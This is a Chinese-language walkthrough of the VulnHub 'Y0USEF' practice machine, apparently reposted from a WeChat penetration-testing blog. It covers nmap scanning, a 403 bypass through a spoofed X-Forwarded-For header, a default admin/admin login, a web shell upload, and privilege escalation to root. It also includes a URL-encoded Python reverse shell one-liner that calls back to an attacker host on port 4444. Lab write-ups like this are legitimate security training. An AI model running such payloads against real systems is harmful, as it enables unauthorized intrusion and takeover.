靶场下载地址:
https://download.vulnhub.com/y0usef/y0usef.ova
信息搜集
一、Nmap进行扫描
nmap -sP 192.168.106.0/24 #对自己的靶机网段进行存活探测,获取靶机地址
nmap -T4 -A -p- 192.168.106.131 #对目标进行全端口扫描
二、WEB服务探测
对目标地址80端口进行目录扫描,通过bypass403发现以下地址可以绕过访问
请求头中添加:X-Forwarded-For: http://127.0.0.1
http://192.168.106.131/adminstration/
通过对登录处进行账号密码爆破
用户名:admin 密码:admin可登录成功
通过访问页面,发现文件上传点,尝试进行shell上传
成功上传shell文件,可进行命令执行
通过搜集发现系统中存在python,直接python命令反弹shell
export%20RHOST%3D%22192.168.106.128%22%3Bexport%20RPORT%3D4444%3Bpython%20-c%20'import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket()%3Bs.connect((os.getenv(%22RHOST%22)%2Cint(os.getenv(%22RPORT%22))))%3B%5Bos.dup2(s.fileno()%2Cfd)%20for%20fd%20in%20(0%2C1%2C2)%5D%3Bpty.spawn(%22%2Fbin%2Fsh%22)'
三、提权
内核漏洞提权,提供搜索内核版本直接利用exp进行提权
通过信息搜集发现存在3个拥有bash权限的用户
在home目录发现发现user.txt文件,获取到一个以下用户的账号密码
user : yousef
pass : yousef123
ssh使用yousef用户进行登录,发现用户存在sudo权限,成功提权到root权限
原文始发于微信公众号(渗透笔记):Y0USEF靶场实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论